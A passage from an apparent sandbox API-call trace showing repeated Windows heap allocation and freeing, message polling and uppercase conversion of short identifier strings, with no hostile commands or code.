lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0190.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.308] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0190.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.308] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.309] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.309] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.309] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.309] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.309] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.309] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.309] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0190.311] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.312] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.312] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.312] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.312] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0190.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.312] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.312] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0190.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.313] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.313] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0190.313] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.314] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0190.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0190.316] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.316] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.316] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.316] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0190.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.317] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.317] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.317] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0190.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.317] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.317] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0190.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0190.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.318] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.318] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 